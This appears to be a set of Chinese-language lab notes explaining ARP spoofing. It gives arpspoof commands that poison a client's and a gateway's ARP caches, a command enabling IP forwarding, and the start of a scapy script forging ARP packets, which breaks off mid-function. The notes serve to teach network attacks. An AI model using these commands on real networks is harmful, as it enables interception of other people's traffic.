协议包分析
ARP原理:
在PC1 访问 Server 的流量 要经过网关 也就是 192.168.1.254
欺骗原理:pc1 与 网关 建立 MAC ARP 缓存
我们将KALI 攻击机的 MAC 发给 pc 1 告诉 此时 ARP关系 与KALI 进行建立
arpspoof - i eth0 -t 192.168.1.254 192.168.1.1 把自己的MAC 发给 192.168.1.1 以网关的身份发过去 -- 192.168.1.254 - 192.168.1.1 这里会更改 用户的 MAC ARP缓存
arpspoof - i eth0 -t 192.168.1.1 192.168.1.254 把自己的MAC 发给 192.168.1.254 以用户的身份发过去 告诉网关 我们才是用户 -- 192.168.1.1 - 192.168.1.254 这里会更改 网关的MAC ARP缓存
这样 192.168.1.1 请求的 结果 就会返回给 KALI KALI 再发给 网关
网关得到的结果 发给客户端 也会返回KALI KALI 再发给客户端
在kali 下操作 需要 echo 1 > /proc/sys/net/ipv4/ip_forward
脚本编写:
利用python
scapy 模块
包:pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
sendp(pkt)
import sys
import time
from scapy.all import *
def arp_spoof(ip1,ip2):
try:
pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
sendp(pkt)
except: